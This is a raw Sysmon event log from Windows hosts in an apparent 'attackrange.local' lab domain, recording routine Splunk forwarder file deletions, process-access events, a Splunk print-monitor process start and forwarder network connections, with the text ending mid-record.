AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D01A52A2BB49406602841149BCDC3003,SHA256=0EEFB16271A8F1FED216A81B8176C64414286618B01941C566EB646CF3C13196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108378Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:04.706{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F49CE85332F28DE89F5346CC4247466,SHA256=670AD596784F38E647A847BB3A3D5DAED53C41B0EA0F0586B5D13E9A4998D2F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083843Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:04.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19EE5876192817FCFFCFE53F30791A2B,SHA256=9F2C51CDCE434F18E0E83A56F8FF4173BC5E3BDA83AFDC02AFB4CB31FD6785C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108377Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:04.091{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D90589A816403E576CCA75438AF614C,SHA256=D4B1A254954EDC446AD3532A0A3B56CDD535973EC6DC3A6994E4A419DFDE8BFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083844Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:05.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B350D47E0BB06B616667DE3AFC2C10,SHA256=EB7AEDCE64F73849C568B4276CA9B38F93551C0543DE6B0C0B7224D6A1C0B2AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108387Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.752{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=700377C7F67C69CA0454523326D141EE,SHA256=C444E1F3DE65E113C524CC13CB80C90C1018FFA3B67BAA813ED9F12A65B2479E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108386Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B575-615A-8E02-00000000FC01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108385Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108384Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108383Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108382Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108381Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B575-615A-8E02-00000000FC01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108380Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.521{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B575-615A-8E02-00000000FC01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108379Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:05.522{58E9C193-B575-615A-8E02-00000000FC01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108390Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:06.770{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D0A47716A32ABA6EF029075F3692E2,SHA256=7C872AE1EEABA75DD7FFADC65D83DAF2D03B2994A382FE9E712FFC1AE4BBF160,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083845Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:06.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407A5CA105D0A7E95CD2D86C2775CE73,SHA256=FAD5D2BB60EF1CF2653A63AA1A49349578FCFF8BE2476FC8F6C2C6513B5F0DBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108389Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:06.536{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=332F6B5FBCD3943E4C4420CF9352317E,SHA256=D562D46AF08BA2A988FBE3F9EC73BFA7367D2897773776F61818D25A29B7E2A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108388Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:04.336{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51961-false10.0.1.12-8000- 23542300x8000000000000000108391Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:07.788{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65DA6F3624F6F9B1E07C6F9457D2C072,SHA256=E54F72168FF2F9E77D1960E35C60BEF4E032DA58DD15C59CE91F97F39CCEFAF6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083847Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:04.780{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50196-false10.0.1.12-8000- 23542300x800000000000000083846Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:07.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8030938A9EF3C56A32BED3F56C0724BD,SHA256=C190878A1C9529657F95606D4C60ABF1CDD916A3E3AFADBC7F6048FA9A6B8C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108392Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:08.803{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3866B8E681A42269F753BB740E306B68,SHA256=675A2638F57077F722A6D23BB9CD34988FCA912AAEA7A6EF51ACC586B6AB5159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083848Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:08.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E86034B60C21B2BB08E6C0B2E75E0F3,SHA256=244EBF71DF8606AE1D7527966B1C2AA917F596FE60C6314C1E06584A0B3AA683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108393Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:09.817{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC9555AA6EDC8A29241D5A562A48915A,SHA256=1F660D6A55D56CEB954AAE4B3D187C2FADBCF04FE07D27E7D38785337C8FA0D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083849Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:09.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=908ECDF1D99F4A2A8BE411227FAEC7C3,SHA256=26C56AD8008C9C4CA86158C80BF99A630D88DD59B1F9E84F8F647D093548C6B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108394Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:10.832{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA4892610D8EF680F36B761DF143C2F,SHA256=0D5A2523B397AA32B3678ED00291D068A52531D5DD874C9B68DD8A15DE4F07F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083850Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:10.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B8765146216C6D87E61D820D6CF0789,SHA256=A599CC34089F97873216E9CF5A7CC1E18CADA2E00DF9D1C7E19A8594EAE302F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108396Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:11.865{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE409C614C1D9F3EA2C136DA532C5699,SHA256=D03FFBAA6BD6567968D16610CC96DDD744DC64868AD5C973330BFA50BF38EC31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083851Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:11.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676CCBCF80502EBEAFC76CAA056A1523,SHA256=F80D480110DE135BB5CF230A5FAB07C8D2F5D596D2864569B75117975A0C2FF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108395Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:09.448{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51962-false10.0.1.12-8000- 23542300x8000000000000000108399Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:12.884{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B4DF12A5FA22A1541438DAEEDD475A,SHA256=5B334F5A779C7D2D3545893869BCEECF3AEABA23B794EC61A6BBDF6C9E828444,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083852Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:12.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A6DD9E2B2FC1806470BA57074135CC,SHA256=CFF31EF4D0556E24E2D7BBDDC642C8EF6CF5AB3166A5EADB3421836B944D5E73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108398Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:12.484{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE088F9DAD9751C6C6B2987487A5F864,SHA256=B4E460C41B7630C2EF268E106D44C12F63A0FD79489A3F0D6B736D598626122A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108397Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:12.484{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E815F32418279A41C8B155B9B69C5A18,SHA256=636E887229A40E5B1A545D5E6B66D839E7E6242261E48B120897EA450F943B19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108400Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:13.899{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B9C794DB29220E676EB789BD78CB527,SHA256=F0354F686505EEF9ADCD6A63C400933C43AEC935B7BA33D3B2A299AE439D2C36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083854Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:13.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83ACD73A9D67AAE3F93E125D14094295,SHA256=03AB98C6AE33F4D7065036BC9B96BF0FA543619180828AB8A3D48C2D4C048515,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083853Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:10.671{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50197-false10.0.1.12-8000- 23542300x8000000000000000108401Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:14.899{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BB4640AD2F327D1A3F6A5A0625A17D,SHA256=182474913C9FA017AFCB12317BDB40A8567115ECCCE82A17D0FB62BA211CA790,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083855Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:14.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0FEFF702EC970E16F4D04B31E5EB1C,SHA256=656A5BB52031AF3A5639DC7E00C6BCF6C0DAACC5843D65A8BD7F70CA337F2562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108402Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:15.930{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05A81CFE9E9A49890F3C35724C7C635,SHA256=105DAC8922802A93830D083557AA02708CF0E525F55188E814B65B6ED2FEF370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083856Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:15.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E25B186EE4BCC1562AACCEE610E7C1D5,SHA256=B36ED20348A0FC3463394F0DAB10628E99F9675B7FD85D7078BDA70DAC59C22D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108404Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:16.982{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B133E4E7989A7F5EB4169FF19A85D7,SHA256=DE31BB66746826A409D8DAB78450CDFD4A2FFB0306A4709CF9EDF59AD1604550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083858Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:16.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8567B6BE1EBEB5523291D6E075AE3D50,SHA256=DEC00691050A4BB04AC0471719B0D52E102AFE8C2A1FBEE68973D33E182DE41B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108403Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:14.460{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51963-false10.0.1.12-8000- 23542300x800000000000000083857Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:16.538{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-036MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083860Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:17.612{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 